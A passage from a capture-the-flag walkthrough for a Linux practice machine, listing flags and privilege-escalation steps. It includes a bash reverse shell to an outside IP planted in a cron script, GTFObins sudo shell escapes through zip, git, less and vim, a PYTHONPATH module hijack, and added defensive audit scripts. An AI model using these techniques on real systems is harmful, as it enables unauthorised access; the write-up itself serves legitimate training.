    padding: 0px 0px 0px 0px;
  }

  body, html {
    padding: 3px 3px 3px 3px;


--- snipped ----

mission24{dbaeb06591a7fd6230407df3a947b89c}

Question 25 – What is the mission25 flag?

  • In this one, we found a binary file named bribe. According to the message it prints, we have to bribe someone in order to reveal the flag. I set the environment variable pocket=money in order to get the flag.

mission23@linuxagency:~$ su mission24
Password: 
mission24@linuxagency:/home/mission23$ cd ..
mission24@linuxagency:/home$ cd mission24
mission24@linuxagency:~$ ls -la
total 40
drwxr-x---  3 mission24 mission24 4096 Feb  1  2021 .
drwxr-xr-x 45 root      root      4096 Jan 12  2021 ..
lrwxrwxrwx  1 mission24 mission24    9 Jan 12  2021 .bash_history -> /dev/null
-rw-r--r--  1 mission24 mission24 3771 Jan 12  2021 .bashrc
-rwxr-xr-x  1 mission24 mission24 8576 Jan 12  2021 bribe
drwxr-xr-x  3 mission24 mission24 4096 Jan 12  2021 .local
-rw-r--r--  1 mission24 mission24  807 Jan 12  2021 .profile
-rw-------  1 mission24 mission24 4934 Jan 12  2021 .viminfo
mission24@linuxagency:~$ ./bribe 


There is a guy who is smuggling flags
Bribe this guy to get the flag
Put some money in his pocket to get the flag

Words are not the price for your flag
Give Me money Man!!!


mission24@linuxagency:~$ export pocket=money
mission24@linuxagency:~$ ./bribe 
Here ya go!!!
mission25{61b93637881c87c71f220033b22a921b}
Don't tell police about the deal man ;)

mission24@linuxagency:~$ 

mission25{61b93637881c87c71f220033b22a921b}

Question 26 – What is the mission26 flag?

  • Next, as mission25, we are unable to execute most of the common commands. I set the PATH environment variable to /bin, which lets us execute the commands and get the flag.

mission24@linuxagency:~$ su mission25
Password: 
mission25@linuxagency:/home/mission24$ cd ..
mission25@linuxagency:/home$ cd mission25
mission25@linuxagency:~$ ls -la
bash: ls: No such file or directory

---snipped ----


mission25@linuxagency:~$ export PATH=/bin
mission25@linuxagency:~$ cat flag.txt 
mission26{cb6ce977c16c57f509e9f8462a120f00}
mission25@linuxagency:~$ 

mission26{cb6ce977c16c57f509e9f8462a120f00}

Question 27 – What is the mission27 flag?

  • For this task, we have received a jpg image file. Analyzing its headers with the strings command reveals the flag.

mission25@linuxagency:~$ su mission26
Password: 
mission26@linuxagency:/home/mission25$ cd .,
bash: cd: .,: Permission denied
mission26@linuxagency:/home/mission25$ cd ..
mission26@linuxagency:/home$ cd mission26
mission26@linuxagency:~$ ls -la
total 100
drwxr-x---  2 mission26 mission26  4096 Jan 12  2021 .
drwxr-xr-x 45 root      root       4096 Jan 12  2021 ..
lrwxrwxrwx  1 mission26 mission26     9 Jan 12  2021 .bash_history -> /dev/null
-rw-r--r--  1 mission26 mission26  3771 Jan 12  2021 .bashrc
-r--------  1 mission26 mission26 85980 Jan 12  2021 flag.jpg
-rw-r--r--  1 mission26 mission26   807 Jan 12  2021 .profile
mission26@linuxagency:~$ strings flag.jpg 
JFIF
-mission27{444d29b932124a48e7dddc0595788f4d}
 , #&')*)
-0-(0%()(
((((((((((((((((((((((((((((((((((((((((((((((((((
RYBP
^C^rP
!aVP
`X*P

--- snipped ---

mission27{444d29b932124a48e7dddc0595788f4d}

Question 28 – What is the mission28 flag?

  • For this task, we have a long file name with multiple extensions. In reality, these multiple extensions are only there to distract us. We only have to decompress the last extension, which is .gz. I used gunzip to do that. Once decompressed, we are presented with a png file. I used the strings command again to reveal the flag.

mission26@linuxagency:~$ su mission27
Password: 
mission27@linuxagency:/home/mission26$ cd ..
mission27@linuxagency:/home$ cd mission27
mission27@linuxagency:~$ ls -la
total 20
drwxr-x---  2 mission27 mission27 4096 Jan 12  2021 .
drwxr-xr-x 45 root      root      4096 Jan 12  2021 ..
lrwxrwxrwx  1 mission27 mission27    9 Jan 12  2021 .bash_history -> /dev/null
-rw-r--r--  1 mission27 mission27 3771 Jan 12  2021 .bashrc
-rw-r--r--  1 mission27 mission27  136 Jan 12  2021 flag.mp3.mp4.exe.elf.tar.php.ipynb.py.rb.html.css.zip.gz.jpg.png.gz
-rw-r--r--  1 mission27 mission27  807 Jan 12  2021 .profile
mission27@linuxagency:~$ gunzip flag.mp3.mp4.exe.elf.tar.php.ipynb.py.rb.html.css.zip.gz.jpg.png.gz
mission27@linuxagency:~$ ls -l
total 4
-rw-r--r-- 1 mission27 mission27 51 Jan 12  2021 flag.mp3.mp4.exe.elf.tar.php.ipynb.py.rb.html.css.zip.gz.jpg.png
mission27@linuxagency:~$ strings flag.mp3.mp4.exe.elf.tar.php.ipynb.py.rb.html.css.zip.gz.jpg.png
GIF87a
mission28{03556f8ca983ef4dc26d2055aef9770f}
mission27@linuxagency:~$ 

mission28{03556f8ca983ef4dc26d2055aef9770f}
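
The strings output above starts with GIF87a even though the decompressed file ends in .png, so the name says nothing reliable about the content. The added example below (not part of the original walkthrough) identifies each layer from its leading magic bytes instead; the function names and the sample file are constructed for illustration.

```shell
#!/bin/sh
# Added example: identify a file by its magic bytes, not its extensions.
# Function names are hypothetical; the sample file is constructed.

# magic_type FILE: name the format from the first bytes of the file.
magic_type() {
    sig=$(od -An -tx1 -N8 "$1" | tr -d ' \n')
    case $sig in
        1f8b*)                        echo gzip ;;
        89504e470d0a1a0a*)            echo png ;;
        474946383761*|474946383961*)  echo gif ;;    # GIF87a / GIF89a
        ffd8ff*)                      echo jpeg ;;
        504b0304*)                    echo zip ;;
        7f454c46*)                    echo elf ;;
        *)                            echo unknown ;;
    esac
}

# claimed_type FILE: what the last extension of the name claims.
claimed_type() {
    case ${1##*.} in
        gz)               echo gzip ;;
        jpg|jpeg)         echo jpeg ;;
        png|gif|zip|elf)  echo "${1##*.}" ;;
        *)                echo unknown ;;
    esac
}

# name_mismatch FILE: succeeds when the name and the content disagree.
name_mismatch() {
    [ "$(claimed_type "$1")" != "$(magic_type "$1")" ]
}

# peel_layers FILE: decompress nested gzip layers in a scratch directory and
# print the chain of real types, e.g. "gzip>gif". The depth is capped so a
# crafted file cannot keep the loop running.
peel_layers() {
    work=$(mktemp -d) || return 1
    cp "$1" "$work/layer0" || { rm -rf "$work"; return 1; }
    n=0
    chain=
    while :; do
        t=$(magic_type "$work/layer$n")
        chain="${chain:+$chain>}$t"
        [ "$t" = gzip ] || break
        if [ "$n" -ge 5 ]; then chain="$chain>too-deep"; break; fi
        if ! gzip -dc "$work/layer$n" > "$work/layer$((n + 1))" 2>/dev/null; then
            chain="$chain>corrupt"; break
        fi
        n=$((n + 1))
    done
    rm -rf "$work"
    echo "$chain"
}

# Constructed sample: a GIF87a header plus placeholder text, gzip-compressed
# and given a misleading multi-extension name like the one in the room.
SAMPLE_DIR=$(mktemp -d)
SAMPLE_GZ="$SAMPLE_DIR/flag.mp3.mp4.exe.png.gz"
SAMPLE_INNER="$SAMPLE_DIR/flag.mp3.mp4.exe.png"
printf 'GIF87a\nsample{constructed-not-a-real-flag}\n' | gzip -c > "$SAMPLE_GZ"
gzip -dc "$SAMPLE_GZ" > "$SAMPLE_INNER"

echo "layers: $(peel_layers "$SAMPLE_GZ")"
if name_mismatch "$SAMPLE_INNER"; then
    echo "name says $(claimed_type "$SAMPLE_INNER"), content is $(magic_type "$SAMPLE_INNER")"
fi
```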

Question 29 – What is the mission29 flag?

  • In this one, we are welcomed by a Ruby interpreter as soon as we log in. We break out of the interactive session by using the exec command to spawn a bash shell. Finally, we get txt.galf, which holds the flag in reverse. Reverse the string with CyberChef to get the flag.

mission27@linuxagency:~$ su mission28
Password: 

irb(main):002:0> exec "/bin/bash"
mission28@linuxagency:/home/mission27$ cd ..
mission28@linuxagency:/home$ cd mission28
mission28@linuxagency:~$ ls 
examples.desktop  txt.galf
mission28@linuxagency:~$ ls -la
total 40
drwxr-x---  3 mission28 mission28 4096 Jan 12  2021 .
drwxr-xr-x 45 root      root      4096 Jan 12  2021 ..
lrwxrwxrwx  1 mission28 mission28    9 Jan 12  2021 .bash_history -> /dev/null
-rw-r--r--  1 mission28 mission28  220 Jan 12  2021 .bash_logout
-rw-r--r--  1 mission28 mission28 3771 Jan 12  2021 .bashrc
-rw-r--r--  1 mission28 mission28 8980 Jan 12  2021 examples.desktop
drwxr-xr-x  3 mission28 mission28 4096 Jan 12  2021 .local
-rw-r--r--  1 mission28 mission28  807 Jan 12  2021 .profile
-r--------  1 mission28 mission28   44 Jan 12  2021 txt.galf
mission28@linuxagency:~$ cat txt.galf 
}1fff2ad47eb52e68523621b8d50b2918{92noissim
mission28@linuxagency:~$ 

mission 29 flag

Cyberchef Reverse

mission29{8192b05d8b12632586e25be74da2fff1}

Question 30 – What is the mission30 flag?

  • Moving on to this task, we found a folder named bludit. Inside it, the .htpasswd file gives us our password.

mission28@linuxagency:~$ su mission29
Password: 
mission29@linuxagency:/home/mission28$ cd ..
mission29@linuxagency:/home$ cd mission29
mission29@linuxagency:~$ ls -la
total 20
drwxr-x---  3 mission29 mission29 4096 Jan 12  2021 .
drwxr-xr-x 45 root      root      4096 Jan 12  2021 ..
lrwxrwxrwx  1 mission29 mission29    9 Jan 12  2021 .bash_history -> /dev/null
-rw-r--r--  1 mission29 mission29 3771 Jan 12  2021 .bashrc
drwxr-xr-x  7 mission29 mission29 4096 Jan 12  2021 bludit
-rw-r--r--  1 mission29 mission29  807 Jan 12  2021 .profile
mission29@linuxagency:~$ cd bludit/
mission29@linuxagency:~/bludit$ ls -la
total 44
drwxr-xr-x  7 mission29 mission29 4096 Jan 12  2021 .
drwxr-x---  3 mission29 mission29 4096 Jan 12  2021 ..
drwxr-xr-x  2 mission29 mission29 4096 Jan 12  2021 bl-content
drwxr-xr-x 10 mission29 mission29 4096 Jan 12  2021 bl-kernel
drwxr-xr-x  2 mission29 mission29 4096 Jan 12  2021 bl-languages
drwxr-xr-x 27 mission29 mission29 4096 Jan 12  2021 bl-plugins
drwxr-xr-x  4 mission29 mission29 4096 Jan 12  2021 bl-themes
-rw-r--r--  1 mission29 mission29  394 Jan 12  2021 .htaccess
-rw-r--r--  1 mission29 mission29   44 Jan 12  2021 .htpasswd
-rw-r--r--  1 mission29 mission29  900 Jan 12  2021 index.php
-rw-r--r--  1 mission29 mission29 1083 Jan 12  2021 LICENSE

mission29@linuxagency:~/bludit$ cat .htaccess 
AddDefaultCharset UTF-8

<IfModule mod_rewrite.c>

# Enable rewrite rules
RewriteEngine on

# Base directory
#RewriteBase /

# Deny direct access to the next directories
RewriteRule ^bl-content/(databases|workspaces|pages|tmp)/.*$ - [R=404,L]

# All URL process by index.php
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*) index.php [PT,L]

</IfModule>mission29@linuxagency:~/bludit$ cat .htpasswd 
mission30{d25b4c9fac38411d2fcb4796171bda6e}
mission29@linuxagency:~/bludit$ 

mission 29
mission 30 flag

mission30{d25b4c9fac38411d2fcb4796171bda6e}

Question 31 – What is viktor’s Flag?

  • For this one, we moved into the Escalator folder and found a folder named .git. Running git log inside it shows the commit log, and one of the commit messages contains the flag.

mission29@linuxagency:/home$ su mission30
Password: 
mission30@linuxagency:/home$ cd mission30
mission30@linuxagency:~$ ls -la
total 36
drwxr-x---  3 mission30 mission30 4096 Jan 12  2021 .
drwxr-xr-x 45 root      root      4096 Jan 12  2021 ..
lrwxrwxrwx  1 mission30 mission30    9 Jan 12  2021 .bash_history -> /dev/null
-rw-r--r--  1 mission30 mission30  220 Jan 12  2021 .bash_logout
-rw-r--r--  1 mission30 mission30 3771 Jan 12  2021 .bashrc
drwxr-xr-x  3 mission30 mission30 4096 Jan 12  2021 Escalator
-rw-r--r--  1 mission30 mission30 8980 Jan 12  2021 examples.desktop
-rw-r--r--  1 mission30 mission30  807 Jan 12  2021 .profile
mission30@linuxagency:~$ cd Escalator/
mission30@linuxagency:~/Escalator$ ls -l
total 4
-rw-r--r-- 1 mission30 mission30 35 Jan 12  2021 sources.py
mission30@linuxagency:~/Escalator$ cat sources.py 

mission30@linuxagency:~/Escalator/.git$ git log 
commit 24cbf44a9cb0e65883b3f76ef5533a2b2ef96497 (HEAD -> master, origin/master)
Author: root <root@Xyan1d3>
Date:   Mon Jan 11 15:37:56 2021 +0530

    My 1st python Script

commit e0b807dbeb5aba190d6307f072abb60b34425d44
Author: root <root@Xyan1d3>
Date:   Mon Jan 11 15:36:40 2021 +0530

    Your flag is viktor{b52c60124c0f8f85fe647021122b3d9a}

mission 30

viktor flag

viktor{b52c60124c0f8f85fe647021122b3d9a}


Task 4 – Privilege Escalation

Question 1 – su into viktor user using viktor’s flag as password

Done

Question 2 – What is dalia’s flag?

  • Checking the cron job entries in /etc/crontab, I found one for dalia in which a script runs with her privileges. We can exploit it because the script is writable by our current user, viktor. We have to inject our reverse shell into the file to get a shell on our attacking machine. This takes a hit-or-miss approach, as the script changes on its own: a second entry, run by root, overwrites it every minute, while dalia's entry executes it 30 seconds later. I spammed the reverse shell one-liner into the script rapidly, at the right moment, to get the reverse shell and the flag.

viktor@linuxagency:/home$ cat /etc/crontab 
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*  *	* * *	dalia	sleep 30;/opt/scripts/47.sh
*  *	* * *	root	echo "IyEvYmluL2Jhc2gKI2VjaG8gIkhlbGxvIDQ3IgpybSAtcmYgL2Rldi9zaG0vCiNlY2hvICJIZXJlIHRpbWUgaXMgYSBncmVhdCBtYXR0ZXIgb2YgZXNzZW5jZSIKcm0gLXJmIC90bXAvCg==" | base64 -d > /opt/scripts/47.sh;chown viktor:viktor /opt/scripts/47.sh;chmod +x /opt/scripts/47.sh;

viktor@linuxagency:/opt/scripts$ cat 47.sh 
#!/bin/bash
#echo "Hello 47"
rm -rf /dev/shm/
#echo "Here time is a great matter of essence"
rm -rf /tmp/
bash -i >& /dev/tcp/10.18.11.103/1234 0>&1
viktor@linuxagency:/opt/scripts$ echo "bash -i >& /dev/tcp/10.18.11.103/1234 0>&1">> 47.sh


wh1terose@fsociety:~$ nc -lvnp 1234
Listening on 0.0.0.0 1234
Connection received on 10.10.62.203 53916
bash: cannot set terminal process group (5082): Inappropriate ioctl for device
bash: no job control in this shell
dalia@linuxagency:~$ ls
ls
examples.desktop
flag.txt
dalia@linuxagency:~$ cat flag.txt
cat flag.txt
dalia{4a94a7a7bb4a819a63a33979926c77dc}
dalia@linuxagency:~$ 

crontab

47.sh and Gun-Shop.py

reverse shell

dalia flag

dalia{4a94a7a7bb4a819a63a33979926c77dc}
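Seen from the defender's side, the weakness in this crontab can be found mechanically: dalia's entry executes a script that another entry hands to viktor. The audit below is an added example, not part of the original walkthrough; the sample crontab is constructed from the entries above with the base64 payload replaced by a placeholder, and the function names are my own.

```python
import os
import pwd
import re
import stat
from typing import NamedTuple

# Constructed sample: the two custom entries from the /etc/crontab shown above,
# with the base64 payload replaced by a placeholder.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
* * * * * dalia sleep 30;/opt/scripts/47.sh
* * * * * root echo "PLACEHOLDER" | base64 -d > /opt/scripts/47.sh;chown viktor:viktor /opt/scripts/47.sh;chmod +x /opt/scripts/47.sh;
"""


class Job(NamedTuple):
    user: str
    command: str


class Meta(NamedTuple):
    owner: str
    mode: int


# System crontab entry: five time fields (or an @keyword), a user, then the command.
ENTRY = re.compile(r"^(?:@\w+|(?:\S+\s+){4}\S+)\s+(\S+)\s+(.+)$")
CHOWN = re.compile(r"\bchown\s+(?:-\S+\s+)*([\w.-]+)(?::[\w.-]*)?\s+([^\s;|&]+)")


def parse_system_crontab(text):
    jobs = []
    for line in (raw.strip() for raw in text.splitlines()):
        if not line or line.startswith("#") or re.match(r"\w+\s*=", line):
            continue  # blank line, comment or VAR=value assignment
        match = ENTRY.match(line)
        if match:
            jobs.append(Job(match.group(1), match.group(2)))
    return jobs


def executed_paths(command):
    """Absolute paths used as the program word of a shell segment."""
    segments = re.split(r";|&&|\|\||\|", command)
    return [seg.split()[0] for seg in segments if seg.strip().startswith("/")]


def file_meta(path):
    """Owner name and permission bits of a file on this host, or None if absent."""
    try:
        info = os.stat(path)
    except OSError:
        return None
    try:
        owner = pwd.getpwuid(info.st_uid).pw_name
    except KeyError:
        owner = str(info.st_uid)
    return Meta(owner, stat.S_IMODE(info.st_mode))


def audit(text, meta_fn=file_meta):
    """Return (cron user, script, reason) for scripts someone else can rewrite."""
    jobs = parse_system_crontab(text)
    assigned = {path: owner for job in jobs  # owners set by chown in any entry
                for owner, path in CHOWN.findall(job.command)}
    findings = []
    for job in jobs:
        trusted = {"root", job.user}
        for path in executed_paths(job.command):
            meta = meta_fn(path)
            if meta and meta.owner not in trusted:
                findings.append((job.user, path, f"owned by {meta.owner}"))
            if meta and meta.mode & (stat.S_IWGRP | stat.S_IWOTH):
                findings.append((job.user, path, "group- or world-writable"))
            if assigned.get(path, job.user) not in trusted:
                findings.append((job.user, path, f"chowned to {assigned[path]} by a cron entry"))
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_CRONTAB):
        print(finding)
```

The fix the findings point to is a script owned by root or by the account that runs it, with no write access for anyone else.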

Question 3 – What is silvio’s flag?

  • For this one, we checked for sudo misconfigurations on the server with sudo -l. As per the output, dalia can run the zip binary as the user silvio without a password. I used the corresponding exploit from GTFObins and captured the flag.

dalia@linuxagency:/home$ sudo -l
Matching Defaults entries for dalia on linuxagency:
    env_reset, env_file=/etc/sudoenv, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User dalia may run the following commands on linuxagency:
    (silvio) NOPASSWD: /usr/bin/zip
dalia@linuxagency:/home$ TF=$(mktemp -u)
dalia@linuxagency:/home$ sudo -u silvio zip $TF /etc/hosts -T -TT 'sh #'

$ id
uid=1032(silvio) gid=1032(silvio) groups=1032(silvio)
$ python -c 'import pty;pty.spawn("/bin/bash")'
silvio@linuxagency:/home$ cd silvio/
silvio@linuxagency:~$ ls
examples.desktop  flag.txt
silvio@linuxagency:~$ cat flag.txt 
silvio{657b4d058c03ab9988875bc937f9c2ef}
silvio@linuxagency:~

silvio flag

silvio{657b4d058c03ab9988875bc937f9c2ef}

Question 4 – What is reza’s flag?

  • Next up we have reza. We checked for sudo misconfigurations again and found one for the git binary. To exploit it, I used GTFObins again: running the exploit as reza gave us the user’s shell and flag.

silvio@linuxagency:~$ sudo -l
Matching Defaults entries for silvio on linuxagency:
    env_reset, env_file=/etc/sudoenv, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User silvio may run the following commands on linuxagency:
    (reza) SETENV: NOPASSWD: /usr/bin/git

silvio@linuxagency:~$ sudo -u reza PAGER='sh -c "exec sh 0<&1"' git -p help
$ id
uid=1033(reza) gid=1033(reza) groups=1033(reza)
$ python -c 'import pty;pty.spawn("/bin/bash")'
reza@linuxagency:/home/silvio$ cd ..
reza@linuxagency:/home$ cd reza/
reza@linuxagency:~$ ls
examples.desktop  flag.txt
reza@linuxagency:~$ cat fla
cat: fla: No such file or directory
reza@linuxagency:~$ cat flag.txt 
reza{2f1901644eda75306f3142d837b80d3e}
reza@linuxagency:~$ 

sudo -l

GTFObins Sudo

reza flag

reza{2f1901644eda75306f3142d837b80d3e}

Question 5 – What is jordan’s flag?

  • Well, this was a pain in the ass for a moment. We have to exploit a Python module import by leveraging a path hijacking vulnerability. The Gun-Shop.py file requires a shop.py module to run, and because the sudo rule carries SETENV we can point PYTHONPATH at a directory we control. We can insert a shell command into shop.py and execute it through the main file to get the shell. The flag is stored reversed; I used CyberChef to reverse it.

reza@linuxagency:/home$ sudo -l
Matching Defaults entries for reza on linuxagency:
    env_reset, env_file=/etc/sudoenv, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User reza may run the following commands on linuxagency:
    (jordan) SETENV: NOPASSWD: /opt/scripts/Gun-Shop.py

reza@linuxagency:/tmp$ touch shop.py
reza@linuxagency:/tmp$ echo "import os" > shop.py               
reza@linuxagency:/tmp$ echo "os.system('/bin/bash')" >> shop.py 
reza@linuxagency:/tmp$ cat shop.py 
import os
os.system('/bin/bash')
reza@linuxagency:/tmp$ sudo -u jordan PYTHONPATH=/tmp/ /opt/scripts/Gun-Shop.py
jordan@linuxagency:/tmp$ cat /home/jordan/flag.txt 
}3c3e9f8796493b98285b9c13c3b4cbcf{nadroj
jordan@linuxagency:/tmp$ 

sudo -l

jordan flag

Cyberchef Reverse

jordan{fcbc4b3c31c9b58289b3946978f9e3c3}
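Why the planted module is picked up, and what stops it, as an added example that is not from the original walkthrough: a script imports a module its own directory lacks, and the interpreter is run with and without honouring PYTHONPATH. The temporary directories and the module name shop_demo are stand-ins for /opt/scripts, /tmp and shop.py, and the planted module is a harmless marker.

```python
import os
import subprocess
import sys
import tempfile


def import_outcome(flags=(), pythonpath=True):
    """Run a script that imports a module its own directory does not provide.

    Returns 'planted' when the module was resolved from the directory named in
    PYTHONPATH and 'import failed' when the interpreter did not look there.
    """
    with tempfile.TemporaryDirectory() as root:
        app = os.path.join(root, "app")          # stands in for /opt/scripts
        planted = os.path.join(root, "planted")  # stands in for a user-writable dir
        os.mkdir(app)
        os.mkdir(planted)
        script = os.path.join(app, "entry.py")   # stands in for Gun-Shop.py
        with open(script, "w") as handle:
            handle.write("import shop_demo\nprint(shop_demo.__file__)\n")
        # Harmless marker module; shop_demo is a hypothetical name for shop.py.
        with open(os.path.join(planted, "shop_demo.py"), "w") as handle:
            handle.write("ORIGIN = 'planted'\n")

        env = dict(os.environ)
        env.pop("PYTHONPATH", None)
        if pythonpath:
            env["PYTHONPATH"] = planted  # what SETENV lets the sudo caller pass
        result = subprocess.run([sys.executable, *flags, script], env=env,
                                capture_output=True, text=True)
        if result.returncode != 0:
            return "import failed"
        loaded = os.path.realpath(result.stdout.strip())
        inside = loaded.startswith(os.path.realpath(planted) + os.sep)
        return "planted" if inside else "elsewhere"


def compare():
    """Outcome for the default interpreter and for each mitigation."""
    return {
        "default interpreter, PYTHONPATH set": import_outcome(),
        "-E (ignore PYTHON* variables)": import_outcome(["-E"]),
        "-I (isolated mode)": import_outcome(["-I"]),
        "PYTHONPATH stripped (env_reset, no SETENV)": import_outcome(pythonpath=False),
    }


if __name__ == "__main__":
    for case, outcome in compare().items():
        print(f"{case:45} {outcome}")
```

Dropping SETENV from the sudoers rule, so that env_reset strips PYTHONPATH, or starting the script's interpreter with -I closes this path.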

Question 6 – What is ken’s flag?

  • We checked again for any sudo misconfigurations and found that jordan can run the less binary as the user ken without a password. So, I read the flag using less with the privileges of the user “ken”. For shell access, I used GTFObins again and got a shell as ken using less.

jordan@linuxagency:/tmp$ sudo -l
Matching Defaults entries for jordan on linuxagency:
    env_reset, env_file=/etc/sudoenv, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User jordan may run the following commands on linuxagency:
    (ken) NOPASSWD: /usr/bin/less
jordan@linuxagency:/tmp$ sudo -u ken /usr/bin/less /home/ken/flag.txt
WARNING: terminal is not fully functional
ken{4115bf456d1aaf012ed4550c418ba99f}
/home/ken/flag.txt (END)


jordan@linuxagency:/tmp$ sudo -u ken less /etc/profile
WARNING: terminal is not fully functional
# /etc/profile: system-wide .profile file for the Bourne shell (sh(1))
# and Bourne compatible shells (bash(1), ksh(1), ash(1), ...).

if [ "${PS1-}" ]; then
  if [ "${BASH-}" ] && [ "$BASH" != "/bin/sh" ]; then
    # The file bash.bashrc already sets the default PS1.
    # PS1='\h:\w\$ '
    if [ -f /etc/bash.bashrc ]; then
      . /etc/bash.bashrc
    fi
  else
    if [ "`id -u`" -eq 0 ]; then
      PS1='# '
    else
      PS1='$ '
    fi
  fi
fi

if [ -d /etc/profile.d ]; then
  for i in /etc/profile.d/*.sh; do
    if [ -r $i ]; then
      . $i
!/bin/shfile
$ id
uid=1036(ken) gid=1036(ken) groups=1036(ken)
$ python -c 'import pty;pty.spawn("/bin/bash")'
ken@linuxagency:/tmp$ 

ken flag

ken shell

ken{4115bf456d1aaf012ed4550c418ba99f}

Question 7 – What is sean’s flag?

  • To get the flag for sean, we exploited the vim binary to get a shell; however, the flag was not in the user’s home directory. After a little research, I found out that the user belongs to the adm group, so the flag might reside in /var/log. Using grep to filter out anything useful, we got our flag. Along with it, we found another string encoded in base64 which, once decoded, reveals the password of penelope.

ken@linuxagency:/tmp$ sudo -l
Matching Defaults entries for ken on linuxagency:
    env_reset, env_file=/etc/sudoenv, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User ken may run the following commands on linuxagency:
    (sean) NOPASSWD: /usr/bin/vim
ken@linuxagency:/tmp$ sudo -u sean vim -c ':!/bin/sh'

E558: Terminal entry not found in terminfo
'unknown' not known. Available builtin terminals are:
    builtin_amiga
    builtin_beos-ansi
    builtin_ansi
    builtin_pcansi
    builtin_win32
    builtin_vt320
    builtin_vt52
    builtin_xterm
    builtin_iris-ansi
    builtin_debug
    builtin_dumb
defaulting to 'ansi'

:!/bin/sh
$ id
uid=1037(sean) gid=1037(sean) groups=1037(sean),4(adm)
$ python -c 'import pty;pty.spawn("/bin/bash")'
sean@linuxagency:/tmp$ cd /home/sean/     
sean@linuxagency:~$ ls
examples.desktop


sean@linuxagency:/var/log$ grep -rn “sean{“ /var/log 2>/dev/null    
sean@linuxagency:/var/log$ grep -R sean ./* 2>/dev/null
./auth.log:Jun 20 11:22:15 localhost sudo:      ken : TTY=pts/0 ; PWD=/tmp ; USER=sean ; COMMAND=/usr/bin/vim -c :!/bin/sh
Binary file ./journal/e5c33f65843d4fde84404ee7ae1a0806/user-1036.journal matches
Binary file ./journal/e5c33f65843d4fde84404ee7ae1a0806/system.journal matches
Binary file ./journal/e5c33f65843d4fde84404ee7ae1a0806/user-1037.journal matches
./kern.log:Jun 20 11:31:00 localhost kernel: [13845.319395] ptrace attach of "vim -c :!/bin/sh"[6678] was attempted by "grep --color=auto -r sean /bin /boot /cdrom /dev /etc /flag.txt /home /initrd.img /initrd.img.old /lib /lib64 /lost+found /media /mnt /opt /proc /root /run /sbin /snap /srv /swapfile /sys /tmp /usr /var /vmlinuz"[11268]
./kern.log:Jun 20 11:31:00 localhost kernel: [13845.319448] ptrace attach of "vim -c :!/bin/sh"[6678] was attempted by "grep --color=auto -r sean /bin /boot /cdrom /dev /etc /flag.txt /home /initrd.img /initrd.img.old /lib /lib64 /lost+found /media /mnt /opt /proc /root /run /sbin /snap /srv /swapfile /sys /tmp /usr /var /vmlinuz"[11268]
./kern.log:Jun 20 11:31:00 localhost kernel: [13845.319874] ptrace attach of "vim -c :!/bin/sh"[6678] was attempted by "grep --color=auto -r sean /bin /boot /cdrom /dev /etc /flag.txt /home /initrd.img /initrd.img.old /lib /lib64 /lost+found /media /mnt /opt /proc /root /run /sbin /snap /srv /swapfile /sys /tmp /usr /var /vmlinuz"[11268]
./syslog:Jun 20 11:31:00 localhost kernel: [13845.319395] ptrace attach of "vim -c :!/bin/sh"[6678] was attempted by "grep --color=auto -r sean /bin /boot /cdrom /dev /etc /flag.txt /home /initrd.img /initrd.img.old /lib /lib64 /lost+found /media /mnt /opt /proc /root /run /sbin /snap /srv /swapfile /sys /tmp /usr /var /vmlinuz"[11268]
./syslog:Jun 20 11:31:00 localhost kernel: [13845.319448] ptrace attach of "vim -c :!/bin/sh"[6678] was attempted by "grep --color=auto -r sean /bin /boot /cdrom /dev /etc /flag.txt /home /initrd.img /initrd.img.old /lib /lib64 /lost+found /media /mnt /opt /proc /root /run /sbin /snap /srv /swapfile /sys /tmp /usr /var /vmlinuz"[11268]
./syslog:Jun 20 11:31:00 localhost kernel: [13845.319874] ptrace attach of "vim -c :!/bin/sh"[6678] was attempted by "grep --color=auto -r sean /bin /boot /cdrom /dev /etc /flag.txt /home /initrd.img /initrd.img.old /lib /lib64 /lost+found /media /mnt /opt /proc /root /run /sbin /snap /srv /swapfile /sys /tmp /usr /var /vmlinuz"[11268]
./syslog.bak:Jan 12 02:58:58 ubuntu kernel: [    0.000000] ACPI: LAPIC_NMI (acpi_id[0x6d] high edge lint[0x1]) : sean{4c5685f4db7966a43cf8e95859801281} VGhlIHBhc3N3b3JkIG9mIHBlbmVsb3BlIGlzIHAzbmVsb3BlCg==
sean@linuxagency:/var/log$ 

sudo -l

stabilizing the shell

sean flag

Cyberchef Base 64 decode

sean{4c5685f4db7966a43cf8e95859801281}

Question 8 – What is penelope’s flag?

  • With the help of the password we found in the last task, log into the SSH server and switch user to penelope with the password – p3nelope. The flag is in the user’s home directory.

agent47@linuxagency:~$ su penelope
Password: 
penelope@linuxagency:/home/agent47$ cd ..
penelope@linuxagency:/home$ cd penelope/
penelope@linuxagency:~$ ls -la
total 80
drwxr-x---  3 penelope penelope  4096 Jan 12  2021 .
drwxr-xr-x 45 root     root      4096 Jan 12  2021 ..
-rwsr-sr-x  1 maya     maya     39096 Jan 12  2021 base64
lrwxrwxrwx  1 penelope penelope     9 Jan 12  2021 .bash_history -> /dev/null
